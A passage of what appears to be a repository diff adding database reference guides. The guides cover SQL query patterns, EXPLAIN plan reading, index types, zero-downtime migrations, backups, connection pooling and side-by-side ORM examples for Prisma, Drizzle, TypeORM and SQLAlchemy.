FROM records curr
LEFT JOIN records prev ON prev.seq_num = curr.seq_num - 1
WHERE prev.id IS NULL AND curr.seq_num > 1;
```
**UPSERT (PostgreSQL)**
```sql
INSERT INTO settings (key, value, updated_at)
VALUES ('theme', 'dark', NOW())
ON CONFLICT (key) DO UPDATE SET value = EXCLUDED.value, updated_at = EXCLUDED.updated_at;
```
**UPSERT (MySQL)**
```sql
INSERT INTO settings (key_name, value, updated_at)
VALUES ('theme', 'dark', NOW())
ON DUPLICATE KEY UPDATE value = VALUES(value), updated_at = VALUES(updated_at);
```
> See references/query_patterns.md for JOINs, CTEs, window functions, JSON operations, and more.
---
## Schema Exploration
### Introspection Queries
**PostgreSQL — list tables and columns**
```sql
SELECT table_name, column_name, data_type, is_nullable, column_default
FROM information_schema.columns
WHERE table_schema = 'public'
ORDER BY table_name, ordinal_position;
```
**PostgreSQL — foreign keys**
```sql
SELECT tc.table_name, kcu.column_name,
ccu.table_name AS foreign_table, ccu.column_name AS foreign_column
FROM information_schema.table_constraints tc
JOIN information_schema.key_column_usage kcu ON tc.constraint_name = kcu.constraint_name
JOIN information_schema.constraint_column_usage ccu ON tc.constraint_name = ccu.constraint_name
WHERE tc.constraint_type = 'FOREIGN KEY';
```
**MySQL — table sizes**
```sql
SELECT table_name, table_rows,
ROUND(data_length / 1024 / 1024, 2) AS data_mb,
ROUND(index_length / 1024 / 1024, 2) AS index_mb
FROM information_schema.tables
WHERE table_schema = DATABASE()
ORDER BY data_length DESC;
```
**SQLite — schema dump**
```sql
SELECT name, sql FROM sqlite_master WHERE type = 'table' ORDER BY name;
```
**SQL Server — columns with types**
```sql
SELECT t.name AS table_name, c.name AS column_name,
ty.name AS data_type, c.max_length, c.is_nullable
FROM sys.columns c
JOIN sys.tables t ON c.object_id = t.object_id
JOIN sys.types ty ON c.user_type_id = ty.user_type_id
ORDER BY t.name, c.column_id;
```
### Generating Documentation from Schema
Use `scripts/schema_explorer.py` to produce markdown or JSON documentation:
```bash
python scripts/schema_explorer.py --dialect postgres --tables all --format md
python scripts/schema_explorer.py --dialect mysql --tables users,orders --format json --json
```
---
## Query Optimization
### EXPLAIN Analysis Workflow
1. **Run EXPLAIN ANALYZE** (PostgreSQL) or **EXPLAIN FORMAT=JSON** (MySQL)
2. **Identify the costliest node** — Seq Scan on large tables, Nested Loop with high row estimates
3. **Check for missing indexes** — sequential scans on filtered columns
4. **Look for estimation errors** — planned vs actual rows divergence signals stale statistics
5. **Evaluate JOIN order** — ensure the smallest result set drives the join
### Index Recommendation Checklist
- Columns in WHERE clauses with high selectivity
- Columns in JOIN conditions (foreign keys)
- Columns in ORDER BY when combined with LIMIT
- Composite indexes matching multi-column WHERE predicates (most selective column first)
- Partial indexes for queries with constant filters (e.g., `WHERE status = 'active'`)
- Covering indexes to avoid table lookups for read-heavy queries
### Query Rewriting Patterns
| Anti-Pattern | Rewrite |
|-------------|---------|
| `SELECT * FROM orders` | `SELECT id, status, total FROM orders` (explicit columns) |
| `WHERE YEAR(created_at) = 2025` | `WHERE created_at >= '2025-01-01' AND created_at < '2026-01-01'` (sargable) |
| Correlated subquery in SELECT | LEFT JOIN with aggregation |
| `NOT IN (SELECT ...)` with NULLs | `NOT EXISTS (SELECT 1 ...)` |
| `UNION` (dedup) when not needed | `UNION ALL` |
| `LIKE '%search%'` | Full-text search index (GIN/FULLTEXT) |
| `ORDER BY RAND()` | Application-side random sampling or `TABLESAMPLE` |
### N+1 Detection
**Symptoms:**
- Application loop that executes one query per parent row
- ORM lazy-loading related entities inside a loop
- Query log shows hundreds of identical SELECT patterns with different IDs
**Fixes:**
- Use eager loading (`include` in Prisma, `joinedload` in SQLAlchemy)
- Batch queries with `WHERE id IN (...)`
- Use DataLoader pattern for GraphQL resolvers
### Static Analysis Tool
```bash
python scripts/query_optimizer.py --query "SELECT * FROM orders WHERE status = 'pending'" --dialect postgres
python scripts/query_optimizer.py --query queries.sql --dialect mysql --json
```
> See references/optimization_guide.md for EXPLAIN plan reading, index types, and connection pooling.
---
## Migration Generation
### Zero-Downtime Migration Patterns
**Adding a column (safe)**
```sql
-- Up
ALTER TABLE users ADD COLUMN phone VARCHAR(20);
-- Down
ALTER TABLE users DROP COLUMN phone;
```
**Renaming a column (expand-contract)**
```sql
-- Step 1: Add new column
ALTER TABLE users ADD COLUMN full_name VARCHAR(255);
-- Step 2: Backfill
UPDATE users SET full_name = name;
-- Step 3: Deploy app reading both columns
-- Step 4: Deploy app writing only new column
-- Step 5: Drop old column
ALTER TABLE users DROP COLUMN name;
```
**Adding a NOT NULL column (safe sequence)**
```sql
-- Step 1: Add nullable
ALTER TABLE orders ADD COLUMN region VARCHAR(50);
-- Step 2: Backfill with default
UPDATE orders SET region = 'unknown' WHERE region IS NULL;
-- Step 3: Add constraint
ALTER TABLE orders ALTER COLUMN region SET NOT NULL;
ALTER TABLE orders ALTER COLUMN region SET DEFAULT 'unknown';
```
**Index creation (non-blocking, PostgreSQL)**
```sql
CREATE INDEX CONCURRENTLY idx_orders_status ON orders (status);
```
### Data Backfill Strategies
- **Batch updates** — process in chunks of 1000-10000 rows to avoid lock contention
- **Background jobs** — run backfills asynchronously with progress tracking
- **Dual-write** — write to old and new columns during transition period
- **Validation queries** — verify row counts and data integrity after each batch
### Rollback Strategies
Every migration must have a reversible down script. For irreversible changes:
1. **Backup before execution**`pg_dump` the affected tables
2. **Feature flags** — application can switch between old/new schema reads
3. **Shadow tables** — keep a copy of the original table during migration window
### Migration Generator Tool
```bash
python scripts/migration_generator.py --change "add email_verified boolean to users" --dialect postgres --format sql
python scripts/migration_generator.py --change "rename column name to full_name in customers" --dialect mysql --format alembic --json
```
---
## Multi-Database Support
### Dialect Differences
| Feature | PostgreSQL | MySQL | SQLite | SQL Server |
|---------|-----------|-------|--------|------------|
| UPSERT | `ON CONFLICT DO UPDATE` | `ON DUPLICATE KEY UPDATE` | `ON CONFLICT DO UPDATE` | `MERGE` |
| Boolean | Native `BOOLEAN` | `TINYINT(1)` | `INTEGER` | `BIT` |
| Auto-increment | `SERIAL` / `GENERATED` | `AUTO_INCREMENT` | `INTEGER PRIMARY KEY` | `IDENTITY` |
| JSON | `JSONB` (indexed) | `JSON` | Text (ext) | `NVARCHAR(MAX)` |
| Array | Native `ARRAY` | Not supported | Not supported | Not supported |
| CTE (recursive) | Full support | 8.0+ | 3.8.3+ | Full support |
| Window functions | Full support | 8.0+ | 3.25.0+ | Full support |
| Full-text search | `tsvector` + GIN | `FULLTEXT` index | FTS5 extension | Full-text catalog |
| LIMIT/OFFSET | `LIMIT n OFFSET m` | `LIMIT n OFFSET m` | `LIMIT n OFFSET m` | `OFFSET m ROWS FETCH NEXT n ROWS ONLY` |
### Compatibility Tips
- **Always use parameterized queries** — prevents SQL injection across all dialects
- **Avoid dialect-specific functions in shared code** — wrap in adapter layer
- **Test migrations on target engine** — `information_schema` varies between engines
- **Use ISO date format** — `'YYYY-MM-DD'` works everywhere
- **Quote identifiers** — use double quotes (SQL standard) or backticks (MySQL)
---
## ORM Patterns
### Prisma
**Schema definition**
```prisma
model User {
id Int @id @default(autoincrement())
email String @unique
name String?
posts Post[]
createdAt DateTime @default(now())
}
model Post {
id Int @id @default(autoincrement())
title String
author User @relation(fields: [authorId], references: [id])
authorId Int
}
```
**Migrations**: `npx prisma migrate dev --name add_user_email`
**Query API**: `prisma.user.findMany({ where: { email: { contains: '@' } }, include: { posts: true } })`
**Raw SQL escape hatch**: `prisma.$queryRaw\`SELECT * FROM users WHERE id = ${userId}\``
### Drizzle
**Schema-first definition**
```typescript
export const users = pgTable('users', {
id: serial('id').primaryKey(),
email: varchar('email', { length: 255 }).notNull().unique(),
name: text('name'),
createdAt: timestamp('created_at').defaultNow(),
});
```
**Query builder**: `db.select().from(users).where(eq(users.email, email))`
**Migrations**: `npx drizzle-kit generate:pg` then `npx drizzle-kit push:pg`
### TypeORM
**Entity decorators**
```typescript
@Entity()
export class User {
@PrimaryGeneratedColumn()
id: number;
@Column({ unique: true })
email: string;
@OneToMany(() => Post, post => post.author)
posts: Post[];
}
```
**Repository pattern**: `userRepo.find({ where: { email }, relations: ['posts'] })`
**Migrations**: `npx typeorm migration:generate -n AddUserEmail`
### SQLAlchemy
**Declarative models**
```python
class User(Base):
__tablename__ = 'users'
id = Column(Integer, primary_key=True)
email = Column(String(255), unique=True, nullable=False)
name = Column(String(255))
posts = relationship('Post', back_populates='author')
```
**Session management**: Always use `with Session() as session:` context manager
**Alembic migrations**: `alembic revision --autogenerate -m "add user email"`
> See references/orm_patterns.md for side-by-side comparisons and migration workflows per ORM.
---
## Data Integrity
### Constraint Strategy
- **Primary keys** — every table must have one; prefer surrogate keys (serial/UUID)
- **Foreign keys** — enforce referential integrity; define ON DELETE behavior explicitly
- **UNIQUE constraints** — for business-level uniqueness (email, slug, API key)
- **CHECK constraints** — validate ranges, enums, and business rules at the DB level
- **NOT NULL** — default to NOT NULL; make nullable only when genuinely optional
### Transaction Isolation Levels
| Level | Dirty Read | Non-Repeatable Read | Phantom Read | Use Case |
|-------|-----------|-------------------|-------------|----------|
| READ UNCOMMITTED | Yes | Yes | Yes | Never recommended |
| READ COMMITTED | No | Yes | Yes | Default for PostgreSQL, general OLTP |
| REPEATABLE READ | No | No | Yes (InnoDB: No) | Financial calculations |
| SERIALIZABLE | No | No | No | Critical consistency (billing, inventory) |
### Deadlock Prevention
1. **Consistent lock ordering** — always acquire locks in the same table/row order
2. **Short transactions** — minimize time between first lock and commit
3. **Advisory locks** — use `pg_advisory_lock()` for application-level coordination
4. **Retry logic** — catch deadlock errors and retry with exponential backoff
---
## Backup & Restore
### PostgreSQL
```bash
# Full backup
pg_dump -Fc --no-owner dbname > backup.dump
# Restore
pg_restore -d dbname --clean --no-owner backup.dump
# Point-in-time recovery: configure WAL archiving + restore_command
```
### MySQL
```bash
# Full backup
mysqldump --single-transaction --routines --triggers dbname > backup.sql
# Restore
mysql dbname < backup.sql
# Binary log for PITR: mysqlbinlog --start-datetime="2025-01-01 00:00:00" binlog.000001
```
### SQLite
```bash
# Backup (safe with concurrent reads)
sqlite3 dbname ".backup backup.db"
```
### Backup Best Practices
- **Automate** — cron or systemd timer, never manual-only
- **Test restores** — untested backups are not backups
- **Offsite copies** — S3, GCS, or separate region
- **Retention policy** — daily for 7 days, weekly for 4 weeks, monthly for 12 months
- **Monitor backup size and duration** — sudden changes signal issues
---
## Anti-Patterns
| Anti-Pattern | Problem | Fix |
|-------------|---------|-----|
| `SELECT *` | Transfers unnecessary data, breaks on schema changes | Explicit column list |
| Missing indexes on FK columns | Slow JOINs and cascading deletes | Add indexes on all foreign keys |
| N+1 queries | 1 + N round trips to database | Eager loading or batch queries |
| Implicit type coercion | `WHERE id = '123'` prevents index use | Match types in predicates |
| No connection pooling | Exhausts connections under load | PgBouncer, ProxySQL, or ORM pool |
| Unbounded queries | No LIMIT risks returning millions of rows | Always paginate |
| Storing money as FLOAT | Rounding errors | Use `DECIMAL(19,4)` or integer cents |
| God tables | One table with 50+ columns | Normalize or use vertical partitioning |
| Soft deletes everywhere | Complicates every query with `WHERE deleted_at IS NULL` | Archive tables or event sourcing |
| Raw string concatenation | SQL injection | Parameterized queries always |
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| **database-designer** | Schema architecture, normalization analysis, ERD generation |
| **database-schema-designer** | Visual ERD modeling, relationship mapping |
| **migration-architect** | Complex multi-step migration orchestration |
| **api-design-reviewer** | Ensuring API endpoints align with query patterns |
| **observability-platform** | Query performance monitoring, slow query alerts |

View File

@@ -0,0 +1,330 @@
# Query Optimization Guide
How to read EXPLAIN plans, choose the right index types, understand query plan operators, and configure connection pooling.
---
## Reading EXPLAIN Plans
### PostgreSQL — EXPLAIN ANALYZE
```sql
EXPLAIN (ANALYZE, BUFFERS, FORMAT TEXT) SELECT * FROM orders WHERE status = 'paid' ORDER BY created_at DESC LIMIT 20;
```
**Sample output:**
```
Limit (cost=0.43..12.87 rows=20 width=128) (actual time=0.052..0.089 rows=20 loops=1)
-> Index Scan Backward using idx_orders_status_created on orders (cost=0.43..4521.33 rows=7284 width=128) (actual time=0.051..0.085 rows=20 loops=1)
Index Cond: (status = 'paid')
Buffers: shared hit=4
Planning Time: 0.156 ms
Execution Time: 0.112 ms
```
**Key fields to check:**
| Field | What it tells you |
|-------|-------------------|
| `cost` | Estimated startup..total cost (arbitrary units) |
| `rows` | Estimated row count at that node |
| `actual time` | Real wall-clock time in milliseconds |
| `actual rows` | Real row count — compare against estimate |
| `Buffers: shared hit` | Pages read from cache (good) |
| `Buffers: shared read` | Pages read from disk (slow) |
| `loops` | How many times the node executed |
**Red flags:**
- `Seq Scan` on a large table with a WHERE clause — missing index
- `actual rows` >> `rows` (estimated) — stale statistics, run `ANALYZE`
- `Nested Loop` with high loop count — consider hash join or add index
- `Sort` with `external merge` — not enough `work_mem`, spilling to disk
- `Buffers: shared read` much higher than `shared hit` — cold cache or table too large for memory
### MySQL — EXPLAIN FORMAT=JSON
```sql
EXPLAIN FORMAT=JSON SELECT * FROM orders WHERE status = 'paid' ORDER BY created_at DESC LIMIT 20;
```
**Key fields:**
- `query_block.select_id` — identifies subqueries
- `table.access_type``ALL` (full scan), `ref` (index lookup), `range`, `index`, `const`
- `table.rows_examined_per_scan` — how many rows the engine reads
- `table.using_index` — covering index (no table lookup needed)
- `table.attached_condition` — the WHERE filter applied
**Access types ranked (best to worst):**
`system` > `const` > `eq_ref` > `ref` > `range` > `index` > `ALL`
---
## Index Types
### B-tree (default)
The workhorse index. Supports equality, range, prefix, and ORDER BY operations.
**Best for:** `=`, `<`, `>`, `<=`, `>=`, `BETWEEN`, `LIKE 'prefix%'`, `ORDER BY`, `MIN()`, `MAX()`
```sql
CREATE INDEX idx_orders_created ON orders (created_at);
```
**Composite B-tree:** Column order matters. The index is useful for queries that filter on a leftmost prefix of the indexed columns.
```sql
-- This index serves: WHERE status = ... AND created_at > ...
-- Also serves: WHERE status = ...
-- Does NOT serve: WHERE created_at > ... (without status)
CREATE INDEX idx_orders_status_created ON orders (status, created_at);
```
### Hash
Equality-only lookups. Faster than B-tree for exact matches but no range support.
**Best for:** `=` lookups on high-cardinality columns
```sql
-- PostgreSQL
CREATE INDEX idx_sessions_token ON sessions USING hash (token);
```
**Limitations:** No range queries, no ORDER BY, not WAL-logged before PostgreSQL 10.
### GIN (Generalized Inverted Index)
For multi-valued data: arrays, JSONB, full-text search vectors.
```sql
-- JSONB containment
CREATE INDEX idx_products_tags ON products USING gin (tags);
-- Query: SELECT * FROM products WHERE tags @> '["sale"]';
-- Full-text search
CREATE INDEX idx_articles_search ON articles USING gin (to_tsvector('english', title || ' ' || body));
```
### GiST (Generalized Search Tree)
For geometric, range, and proximity data.
```sql
-- Range type (e.g., date ranges)
CREATE INDEX idx_bookings_period ON bookings USING gist (during);
-- Query: SELECT * FROM bookings WHERE during && '[2025-01-01, 2025-01-31]';
-- PostGIS geometry
CREATE INDEX idx_locations_geom ON locations USING gist (geom);
```
### BRIN (Block Range INdex)
Tiny index for naturally ordered data (e.g., time-series append-only tables).
```sql
CREATE INDEX idx_events_created ON events USING brin (created_at);
```
**Best for:** Large tables where the indexed column correlates with physical row order. Much smaller than B-tree but less precise.
### Partial Index
Index only rows matching a condition. Smaller and faster for targeted queries.
```sql
-- Only index active users (skip millions of inactive)
CREATE INDEX idx_users_active_email ON users (email) WHERE status = 'active';
```
### Covering Index (INCLUDE)
Store extra columns in the index to avoid table lookups (index-only scans).
```sql
-- PostgreSQL 11+
CREATE INDEX idx_orders_status ON orders (status) INCLUDE (total, created_at);
-- Query can be answered entirely from the index:
-- SELECT total, created_at FROM orders WHERE status = 'paid';
```
### Expression Index
Index the result of a function or expression.
```sql
CREATE INDEX idx_users_lower_email ON users (LOWER(email));
-- Query: SELECT * FROM users WHERE LOWER(email) = 'user@example.com';
```
---
## Query Plan Operators
### Scan operators
| Operator | Description | Performance |
|----------|-------------|-------------|
| **Seq Scan** | Full table scan, reads every row | Slow on large tables |
| **Index Scan** | B-tree lookup + table fetch | Fast for selective queries |
| **Index Only Scan** | Reads only the index (covering) | Fastest for covered queries |
| **Bitmap Index Scan** | Builds a bitmap of matching pages | Good for medium selectivity |
| **Bitmap Heap Scan** | Fetches pages identified by bitmap | Pairs with bitmap index scan |
### Join operators
| Operator | Description | Best when |
|----------|-------------|-----------|
| **Nested Loop** | For each outer row, scan inner | Small outer set, indexed inner |
| **Hash Join** | Build hash table on inner, probe with outer | Medium-large sets, no index |
| **Merge Join** | Merge two sorted inputs | Both inputs already sorted |
### Other operators
| Operator | Description |
|----------|-------------|
| **Sort** | Sorts rows (may spill to disk if work_mem exceeded) |
| **Hash Aggregate** | GROUP BY using hash table |
| **Group Aggregate** | GROUP BY on pre-sorted input |
| **Limit** | Stops after N rows |
| **Materialize** | Caches subquery results in memory |
| **Gather / Gather Merge** | Collects results from parallel workers |
---
## Connection Pooling
### Why pool connections?
Each database connection consumes memory (5-10 MB in PostgreSQL). Without pooling:
- Application creates a new connection per request (slow: TCP + TLS + auth)
- Under load, connection count spikes past `max_connections`
- Database OOM or connection refused errors
### PgBouncer (PostgreSQL)
The standard external connection pooler for PostgreSQL.
**Modes:**
- **Session** — connection assigned for entire client session (safest, least efficient)
- **Transaction** — connection returned to pool after each transaction (recommended)
- **Statement** — connection returned after each statement (cannot use transactions)
```ini
# pgbouncer.ini
[databases]
mydb = host=127.0.0.1 port=5432 dbname=mydb
[pgbouncer]
pool_mode = transaction
max_client_conn = 200
default_pool_size = 20
min_pool_size = 5
reserve_pool_size = 5
reserve_pool_timeout = 3
server_idle_timeout = 300
```
**Sizing formula:**
```
default_pool_size = num_cpu_cores * 2 + effective_spindle_count
```
For SSDs, start with `num_cpu_cores * 2` (typically 4-16 connections is optimal).
### ProxySQL (MySQL)
```ini
mysql_servers = ({ address="127.0.0.1", port=3306, hostgroup=0, max_connections=100 })
mysql_query_rules = ({ rule_id=1, match_pattern="^SELECT.*FOR UPDATE", destination_hostgroup=0 })
```
### Application-Level Pooling
Most ORMs and drivers include built-in pooling:
| Platform | Pool Configuration |
|----------|--------------------|
| **node-postgres** | `new Pool({ max: 20, idleTimeoutMillis: 30000 })` |
| **SQLAlchemy** | `create_engine(url, pool_size=20, max_overflow=5)` |
| **HikariCP (Java)** | `maximumPoolSize=20, minimumIdle=5, idleTimeout=300000` |
| **Prisma** | `connection_limit=20` in connection string |
### Pool Sizing Guidelines
| Metric | Guideline |
|--------|-----------|
| **Minimum** | Number of always-active background workers |
| **Maximum** | 2-4x CPU cores for OLTP; lower for OLAP |
| **Idle timeout** | 30-300 seconds (reclaim unused connections) |
| **Connection timeout** | 3-10 seconds (fail fast under pressure) |
| **Queue size** | 2-5x pool max (buffer bursts before rejecting) |
**Warning:** More connections does not mean better performance. Beyond the optimal point (usually 20-50), contention on locks, CPU, and I/O causes throughput to decrease.
---
## Statistics and Maintenance
### PostgreSQL
```sql
-- Update statistics for the query planner
ANALYZE orders;
ANALYZE; -- All tables
-- Check table bloat and dead tuples
SELECT relname, n_dead_tup, last_autovacuum, last_autoanalyze
FROM pg_stat_user_tables ORDER BY n_dead_tup DESC;
-- Identify unused indexes
SELECT indexrelname, idx_scan, pg_size_pretty(pg_relation_size(indexrelid)) AS size
FROM pg_stat_user_indexes
WHERE idx_scan = 0 AND indexrelname NOT LIKE '%pkey%'
ORDER BY pg_relation_size(indexrelid) DESC;
```
### MySQL
```sql
-- Update statistics
ANALYZE TABLE orders;
-- Check index usage
SELECT * FROM sys.schema_unused_indexes;
SELECT * FROM sys.schema_redundant_indexes;
-- Identify long-running queries
SELECT * FROM information_schema.processlist WHERE time > 10;
```
---
## Performance Checklist
Before deploying any query to production:
1. Run `EXPLAIN ANALYZE` and verify no unexpected sequential scans
2. Check that estimated rows are within 10x of actual rows
3. Verify index usage on all WHERE, JOIN, and ORDER BY columns
4. Ensure LIMIT is present for user-facing list queries
5. Confirm parameterized queries (no string concatenation)
6. Test with production-like data volume (not just 10 rows)
7. Monitor query time in application metrics after deployment
8. Set up slow query log alerting (> 100ms for OLTP, > 5s for reports)
---
## Quick Reference: When to Use Which Index
| Query Pattern | Index Type |
|--------------|-----------|
| `WHERE col = value` | B-tree or Hash |
| `WHERE col > value` | B-tree |
| `WHERE col LIKE 'prefix%'` | B-tree |
| `WHERE col LIKE '%substring%'` | GIN (full-text) or trigram |
| `WHERE jsonb_col @> '{...}'` | GIN |
| `WHERE array_col && ARRAY[...]` | GIN |
| `WHERE range_col && '[a,b]'` | GiST |
| `WHERE ST_DWithin(geom, ...)` | GiST |
| `WHERE col = value` (append-only) | BRIN |
| `WHERE col = value AND status = 'active'` | Partial B-tree |
| `SELECT a, b WHERE c = value` | Covering (INCLUDE) |

View File

@@ -0,0 +1,451 @@
# ORM Patterns Reference
Side-by-side comparison of Prisma, Drizzle, TypeORM, and SQLAlchemy patterns for common database operations.
---
## Schema Definition
### Prisma (schema.prisma)
```prisma
model User {
id Int @id @default(autoincrement())
email String @unique
name String?
role Role @default(USER)
posts Post[]
profile Profile?
createdAt DateTime @default(now())
updatedAt DateTime @updatedAt
@@index([email])
@@map("users")
}
model Post {
id Int @id @default(autoincrement())
title String
body String?
published Boolean @default(false)
author User @relation(fields: [authorId], references: [id], onDelete: Cascade)
authorId Int
tags Tag[]
createdAt DateTime @default(now())
@@index([authorId])
@@index([published, createdAt])
@@map("posts")
}
enum Role {
USER
ADMIN
MODERATOR
}
```
### Drizzle (schema.ts)
```typescript
import { pgTable, serial, varchar, text, boolean, timestamp, integer, pgEnum } from 'drizzle-orm/pg-core';
export const roleEnum = pgEnum('role', ['USER', 'ADMIN', 'MODERATOR']);
export const users = pgTable('users', {
id: serial('id').primaryKey(),
email: varchar('email', { length: 255 }).notNull().unique(),
name: varchar('name', { length: 255 }),
role: roleEnum('role').default('USER').notNull(),
createdAt: timestamp('created_at').defaultNow().notNull(),
updatedAt: timestamp('updated_at').defaultNow().notNull(),
});
export const posts = pgTable('posts', {
id: serial('id').primaryKey(),
title: varchar('title', { length: 255 }).notNull(),
body: text('body'),
published: boolean('published').default(false).notNull(),
authorId: integer('author_id').notNull().references(() => users.id, { onDelete: 'cascade' }),
createdAt: timestamp('created_at').defaultNow().notNull(),
}, (table) => ({
authorIdx: index('idx_posts_author').on(table.authorId),
publishedIdx: index('idx_posts_published').on(table.published, table.createdAt),
}));
```
### TypeORM (entities)
```typescript
import { Entity, PrimaryGeneratedColumn, Column, ManyToOne, OneToMany, CreateDateColumn, UpdateDateColumn, Index } from 'typeorm';
export enum Role { USER = 'USER', ADMIN = 'ADMIN', MODERATOR = 'MODERATOR' }
@Entity('users')
export class User {
@PrimaryGeneratedColumn()
id: number;
@Column({ unique: true })
@Index()
email: string;
@Column({ nullable: true })
name: string;
@Column({ type: 'enum', enum: Role, default: Role.USER })
role: Role;
@OneToMany(() => Post, post => post.author)
posts: Post[];
@CreateDateColumn()
createdAt: Date;
@UpdateDateColumn()
updatedAt: Date;
}
@Entity('posts')
@Index(['published', 'createdAt'])
export class Post {
@PrimaryGeneratedColumn()
id: number;
@Column()
title: string;
@Column({ nullable: true, type: 'text' })
body: string;
@Column({ default: false })
published: boolean;
@ManyToOne(() => User, user => user.posts, { onDelete: 'CASCADE' })
author: User;
@Column()
authorId: number;
@CreateDateColumn()
createdAt: Date;
}
```
### SQLAlchemy (models.py)
```python
import enum
from datetime import datetime
from sqlalchemy import Column, Integer, String, Text, Boolean, DateTime, Enum, ForeignKey, Index
from sqlalchemy.orm import relationship, DeclarativeBase
class Base(DeclarativeBase):
pass
class Role(enum.Enum):
USER = "USER"
ADMIN = "ADMIN"
MODERATOR = "MODERATOR"
class User(Base):
__tablename__ = 'users'
id = Column(Integer, primary_key=True, autoincrement=True)
email = Column(String(255), unique=True, nullable=False, index=True)
name = Column(String(255), nullable=True)
role = Column(Enum(Role), default=Role.USER, nullable=False)
posts = relationship('Post', back_populates='author', cascade='all, delete-orphan')
created_at = Column(DateTime, default=datetime.utcnow, nullable=False)
updated_at = Column(DateTime, default=datetime.utcnow, onupdate=datetime.utcnow, nullable=False)
class Post(Base):
__tablename__ = 'posts'
__table_args__ = (
Index('idx_posts_published', 'published', 'created_at'),
)
id = Column(Integer, primary_key=True, autoincrement=True)
title = Column(String(255), nullable=False)
body = Column(Text, nullable=True)
published = Column(Boolean, default=False, nullable=False)
author_id = Column(Integer, ForeignKey('users.id', ondelete='CASCADE'), nullable=False, index=True)
author = relationship('User', back_populates='posts')
created_at = Column(DateTime, default=datetime.utcnow, nullable=False)
```
---
## CRUD Operations
### Create
| ORM | Pattern |
|-----|---------|
| **Prisma** | `await prisma.user.create({ data: { email, name } })` |
| **Drizzle** | `await db.insert(users).values({ email, name }).returning()` |
| **TypeORM** | `await userRepo.save(userRepo.create({ email, name }))` |
| **SQLAlchemy** | `session.add(User(email=email, name=name)); session.commit()` |
### Read (with filter)
| ORM | Pattern |
|-----|---------|
| **Prisma** | `await prisma.user.findMany({ where: { role: 'ADMIN' }, orderBy: { createdAt: 'desc' } })` |
| **Drizzle** | `await db.select().from(users).where(eq(users.role, 'ADMIN')).orderBy(desc(users.createdAt))` |
| **TypeORM** | `await userRepo.find({ where: { role: Role.ADMIN }, order: { createdAt: 'DESC' } })` |
| **SQLAlchemy** | `session.query(User).filter(User.role == Role.ADMIN).order_by(User.created_at.desc()).all()` |
### Update
| ORM | Pattern |
|-----|---------|
| **Prisma** | `await prisma.user.update({ where: { id }, data: { name } })` |
| **Drizzle** | `await db.update(users).set({ name }).where(eq(users.id, id))` |
| **TypeORM** | `await userRepo.update(id, { name })` |
| **SQLAlchemy** | `session.query(User).filter(User.id == id).update({User.name: name}); session.commit()` |
### Delete
| ORM | Pattern |
|-----|---------|
| **Prisma** | `await prisma.user.delete({ where: { id } })` |
| **Drizzle** | `await db.delete(users).where(eq(users.id, id))` |
| **TypeORM** | `await userRepo.delete(id)` |
| **SQLAlchemy** | `session.query(User).filter(User.id == id).delete(); session.commit()` |
---
## Relations and Eager Loading
### Prisma — include / select
```typescript
// Eager load posts with user
const user = await prisma.user.findUnique({
where: { id: 1 },
include: { posts: { where: { published: true }, orderBy: { createdAt: 'desc' } } },
});
// Nested create
await prisma.user.create({
data: {
email: 'new@example.com',
posts: { create: [{ title: 'First post' }] },
},
});
```
### Drizzle — relational queries
```typescript
const result = await db.query.users.findFirst({
where: eq(users.id, 1),
with: { posts: { where: eq(posts.published, true), orderBy: [desc(posts.createdAt)] } },
});
```
### TypeORM — relations / query builder
```typescript
// FindOptions
const user = await userRepo.findOne({ where: { id: 1 }, relations: ['posts'] });
// QueryBuilder for complex joins
const result = await userRepo.createQueryBuilder('u')
.leftJoinAndSelect('u.posts', 'p', 'p.published = :pub', { pub: true })
.where('u.id = :id', { id: 1 })
.getOne();
```
### SQLAlchemy — joinedload / selectinload
```python
from sqlalchemy.orm import joinedload, selectinload
# Eager load in one JOIN query
user = session.query(User).options(joinedload(User.posts)).filter(User.id == 1).first()
# Eager load in a separate IN query (better for collections)
users = session.query(User).options(selectinload(User.posts)).all()
```
---
## Raw SQL Escape Hatches
Every ORM should provide a way to execute raw SQL for complex queries:
| ORM | Pattern |
|-----|---------|
| **Prisma** | `` prisma.$queryRaw`SELECT * FROM users WHERE id = ${id}` `` |
| **Drizzle** | `db.execute(sql`SELECT * FROM users WHERE id = ${id}`)` |
| **TypeORM** | `dataSource.query('SELECT * FROM users WHERE id = $1', [id])` |
| **SQLAlchemy** | `session.execute(text('SELECT * FROM users WHERE id = :id'), {'id': id})` |
Always use parameterized queries in raw SQL to prevent injection.
---
## Transaction Patterns
### Prisma
```typescript
await prisma.$transaction(async (tx) => {
const user = await tx.user.create({ data: { email } });
await tx.post.create({ data: { title: 'Welcome', authorId: user.id } });
});
```
### Drizzle
```typescript
await db.transaction(async (tx) => {
const [user] = await tx.insert(users).values({ email }).returning();
await tx.insert(posts).values({ title: 'Welcome', authorId: user.id });
});
```
### TypeORM
```typescript
await dataSource.transaction(async (manager) => {
const user = await manager.save(User, { email });
await manager.save(Post, { title: 'Welcome', authorId: user.id });
});
```
### SQLAlchemy
```python
with Session() as session:
try:
user = User(email=email)
session.add(user)
session.flush() # Get user.id without committing
session.add(Post(title='Welcome', author_id=user.id))
session.commit()
except Exception:
session.rollback()
raise
```
---
## Migration Workflows
### Prisma
```bash
# Generate migration from schema changes
npx prisma migrate dev --name add_posts_table
# Apply in production
npx prisma migrate deploy
# Reset database (dev only)
npx prisma migrate reset
# Generate client after schema change
npx prisma generate
```
**Files:** `prisma/migrations/<timestamp>_<name>/migration.sql`
### Drizzle
```bash
# Generate migration SQL from schema diff
npx drizzle-kit generate:pg
# Push schema directly (dev only, no migration files)
npx drizzle-kit push:pg
# Apply migrations
npx drizzle-kit migrate
```
**Files:** `drizzle/<timestamp>_<name>.sql`
### TypeORM
```bash
# Auto-generate migration from entity changes
npx typeorm migration:generate -d data-source.ts -n AddPostsTable
# Create empty migration
npx typeorm migration:create -n CustomMigration
# Run pending migrations
npx typeorm migration:run -d data-source.ts
# Revert last migration
npx typeorm migration:revert -d data-source.ts
```
**Files:** `src/migrations/<timestamp>-<Name>.ts`
### SQLAlchemy (Alembic)
```bash
# Initialize Alembic
alembic init alembic
# Auto-generate migration from model changes
alembic revision --autogenerate -m "add posts table"
# Apply all pending
alembic upgrade head
# Revert one step
alembic downgrade -1
# Show current state
alembic current
```
**Files:** `alembic/versions/<hash>_<slug>.py`
---
## N+1 Prevention Cheat Sheet
| ORM | Lazy (N+1 risk) | Eager (fixed) |
|-----|-----------------|---------------|
| **Prisma** | Not accessing `include` | `include: { posts: true }` |
| **Drizzle** | Separate queries | `with: { posts: true }` |
